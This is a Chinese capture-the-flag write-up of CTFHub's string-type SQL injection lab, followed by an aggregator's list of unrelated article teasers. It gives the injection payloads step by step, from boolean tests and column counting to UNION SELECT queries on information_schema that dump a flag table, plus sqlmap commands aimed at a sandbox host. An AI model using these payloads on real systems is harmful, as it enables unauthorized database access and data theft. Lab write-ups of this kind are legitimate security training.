CTFHUB技能树之SQL——字符型注入

CTFHUB技能树之SQL——字符型注入

article2024/10/23 2:53:21/文章来源:https://blog.csdn.net/weixin_73049307/article/details/142927306

开启靶场，打开链接：

直接指明是SQL字符型注入，但还是来判断一下

（1）检查是否存在注入点

1' and 1=1#

返回正确

1' and 1=2#

返回错误

说明存在SQL字符型注入

（2）猜字段数

1' order by 2#

1' order by 3#

说明字段数是2

（3）爆数据库名

1' and 1=2 union select 1,database()#

得知数据库名是sqli

（4）爆表名

1' and 1=2 union select 1,group_concat(table_name)from information_schema.tables where table_schema='sqli'#

显示表名是news表和flag表，其中flag表是我们需要的

（5）爆列名

1' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'#

得知flag表的列名是flag

（6）爆字段内容（flag）

1' and 1=2 union select 1,group_concat(flag) from sqli.flag#

成功得到flag：

ctfhub{ee5bfa3b423eb2d6142c66b9}

接下来就用一下sqlmap来试一下：

python sqlmap.py -u "http://challenge-a046856826dbc5de.sandbox.ctfhub.com:10800/?id=1" -D sqli --tables

python sqlmap.py -u "http://challenge-a046856826dbc5de.sandbox.ctfhub.com:10800/?id=1" -D sqli -T flag --dump

一样成功得到flag

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：/a/897263.html

如若内容造成侵权/违法违规/事实不符，请联系我们进行投诉反馈qq邮箱809451989@qq.com，一经查实，立即删除！

相关文章

颠覆编程！通义灵码、包阅AI、CodeGeeX三大AI助手解锁无限潜力！

颠覆编程！通义灵码、包阅AI、CodeGeeX三大AI助手解锁无限潜力！

随着科技的疾速前行，人工智能（AI）辅助编程工具已跃然成为软件开发领域及编程爱好者群体中不可或缺的得力助手。这些融入了尖端智能化算法的工具，不仅深刻改变了编程工作的面貌，通过自动化和优化手段显著提升了编程效率…

阅读更多...

GJS-WCP

GJS-WCP

不懂的就问，但我也是二把手......哭死 web GJS-ezssti 很常规的ssti模板注入，只过滤了"/","flag"。过滤了/,flag 可以利用bash的特性绕过，如字符串截取，环境变量等等。payload1: {{url_for.__globals__[…

阅读更多...

柔性数组的使用

柔性数组的使用

//柔性数组的使用 #include<stdio.h> #include<stdlib.h> #include<errno.h> struct s {int i;int a[]; }; int main() {struct s* ps (struct s*)malloc(sizeof(struct s) 20 * sizeof(int));if (ps NULL){perror("malloc");return 1;}//使用这…

阅读更多...

react18中在列表项中如何使用useRef来获取每项的dom对象

react18中在列表项中如何使用useRef来获取每项的dom对象

在react中获取dom节点都知道用ref，但是在一个列表循环中，这样做是行不通的，需要做进一步的数据处理。实现效果需求：点击每张图片，当前图片出现在可视区域。代码实现 .box{border: 1px solid #000;list-style: …

阅读更多...

Math类、System类、Runtime类、Object类、Objects类、BigInteger类、BigDecimal类

Math类、System类、Runtime类、Object类、Objects类、BigInteger类、BigDecimal类

课程目标能够熟练使用Math类中的常见方法能够熟练使用System类中的常见方法能够理解Object类的常见方法作用能够熟练使用Objects类的常见方法能够熟练使用BigInteger类的常见方法能够熟练使用BigDecimal类的常见方法 1 Math类 1.1 概述 tips：了解内容…

阅读更多...

Java | Leetcode Java题解之第493题翻转对

Java | Leetcode Java题解之第493题翻转对

题目： 题解： class Solution {public int reversePairs(int[] nums) {Set<Long> allNumbers new TreeSet<Long>();for (int x : nums) {allNumbers.add((long) x);allNumbers.add((long) x * 2);}// 利用哈希表进行离散化Map<Long, Int…

阅读更多...

【JAVA】第三张_Eclipse下载、安装、汉化

【JAVA】第三张_Eclipse下载、安装、汉化

简介 Eclipse是一种流行的集成开发环境（IDE），可用于开发各种编程语言，包括Java、C、Python等。它最初由IBM公司开发，后来被Eclipse Foundation接手并成为一个开源项目。 Eclipse提供了一个功能强大的开发平台&#x…

阅读更多...

AI 编译器学习笔记之四 -- cann接口使用

AI 编译器学习笔记之四 -- cann接口使用

1、安装昇腾依赖 # CANN发布件地址 https://cmc.rnd.huawei.com/cmcversion/index/releaseView?deltaId10274626629404288&isSelectSoftware&url_datarun Ascend-cann-toolkit_8.0.T15_linux-aarch64.run Ascend-cann-nnal_8.0.T15_linux-aarch64.run Ascend-cann-ker…

阅读更多...

当下大语言模型（LLM）应用的架构介绍

当下大语言模型（LLM）应用的架构介绍

想要构建你的第一个大语言模型应用？这里有你需要了解的一切，以及你今天就能开始探索的问题领域。 LLM 应用架构我们的目标是让你能够自由地使用大语言模型进行实验、打造自己的应用，并挖掘那些尚未被人注意的问题领域。为此，Git…

阅读更多...

数据类型的通用操作

数据类型的通用操作

#通用操作有：for语句遍历，len()统计元素个数，是数据类型间的相互转换，元素的排序（正反向） 1.for语句遍历若遍历字典则只去字典中的key(即名词) 2.各数据类型间的数据转换（若为字典转化为列表…

阅读更多...

2024年软件设计师中级（软考中级）详细笔记【7】面向对象技术（上）（分值10+）

2024年软件设计师中级（软考中级）详细笔记【7】面向对象技术（上）（分值10+）

目录前言第7章面向对象技术 （上）7.1 面向对象基础(3-4分）7.1.1 面向对象的基本概念7.1.2 面向对象分析（熟记）7.1.3 面向对象设计7.1.4 面向对象程序设计7.1.5 面向对象测试 7.2 UML(3~4分)7.2.1 事务7.2.2 关系7.2.2…

阅读更多...

超详细JDK安装+环境配置教程

超详细JDK安装+环境配置教程

安装jdk 1.首先在JDK官网进行下载 JDK会默认安装在C盘 program file文件下 2.并且在JDK安装的过程中会提示安装JRE JDK和JRE会安装在同一目录下 JDK通过命令行进行使用 JDK的目录以下是JDK对应的目录 bin:存放可执行程序其中包含java javac命令 Include：本地…

阅读更多...

013_django基于大数据的高血压人群分析系统2024_dcb7986h_055

013_django基于大数据的高血压人群分析系统2024_dcb7986h_055

目录系统展示开发背景代码实现项目案例获取源码博主介绍：CodeMentor毕业设计领航者、全网关注者30W群落，InfoQ特邀专栏作家、技术博客领航者、InfoQ新星培育计划导师、Web开发领域杰出贡献者，博客领航之星、开发者头条/腾讯云/AW…

阅读更多...

react-native 安装自学笔记（踩坑点）

react-native 安装自学笔记（踩坑点）

react-native环境安装搭建注意点安装环境文档地址： Android 原生UI组件 React Native 中文网（中文网可能有些信息没有外文的更新及时） 1.必须要安装node 和 jdk 坑点：node版本18/18 jdk版本文档要求17，但是我clo…

阅读更多...

微服务的一些基本概念

微服务的一些基本概念

目录 1 概述1.1 微服务架构的特征1.2 微服务架构示例 2 微服务与单体式架构2.1 什么是单体式架构？2.2 单体式架构的优点2.3 单体式架构的缺点 3 什么是微服务？3.1 微服务的优点3.2 微服务的缺点 4 如何构建微服务4.1 从单体式开始4.2 以正确的方式组织团…

阅读更多...

OBOO鸥柏：液晶拼接大屏搭载节点盒分布式集中管控控制系统新技术

OBOO鸥柏：液晶拼接大屏搭载节点盒分布式集中管控控制系统新技术

近年来，随着视频监控、会议系统及展示需求的快速增长，KVM分布式输入输出节点控制系统在各大行业中逐渐成为核心技术。OBOO鸥柏的液晶拼接大屏分布式输入输出节点控制系统（WControl），以其创新的技术和卓越的用户体验&am…

阅读更多...

详细尝鲜flutter

详细尝鲜flutter

flutter 161由于官方的汉化文档感觉还是有很多没有汉化的地方 ，所以自己打一遍的同时写下了以下笔记社区生态官方文档所有的控件:Widget 目录 | Flutter 中文文档 - Flutter 中文开发者网站 - Flutter 官方论坛的教程 Flutter Widget框架概述 - Flutter中文网…

阅读更多...

iTOP-RK3568开发板独立NPU通过算法加特应用到以下的场景

iTOP-RK3568开发板独立NPU通过算法加特应用到以下的场景

iTOP-3568开发板采用瑞芯微RK3568处理器，内部集成了四核64位Cortex-A55处理器。主频高达2.0Ghz，RK809动态调频。集成了双核心架构GPU，ARM G52 2EE、支持OpenGLES1.1/2.0/3.2、OpenCL2.0、Vulkan1.1、内嵌高性能2D加速硬件。内置独立NPU,算力…

阅读更多...

2024软考网络工程师笔记 - 第10章.组网技术

2024软考网络工程师笔记 - 第10章.组网技术

文章目录交换机基础1️⃣交换机分类2️⃣其他分类方式3️⃣级联和堆叠4️⃣堆叠优劣势5️⃣交换机性能参数 🕑路由器基础1️⃣路由器接口2️⃣交换机路由器管理方式2️⃣交换机路由器管理方式交换机基础 1️⃣交换机分类 1.根据交换方式分存储转发式交换(Store…

阅读更多...

信息搜集 ---开发框架识别

信息搜集 ---开发框架识别

开发框架识别插件推荐插件商店搜索wappalyzer Python - Django&Flask Django 1、wappalyzer插件 2、返回数据包的特征字段 Set-Cookie:expires Flask 1、wappalyzer插件 2、返回数据包的特征字段 Set-Cookie:expires 或 Etag: "flask PHP - ThinkPHP&Lar…

阅读更多...

最新文章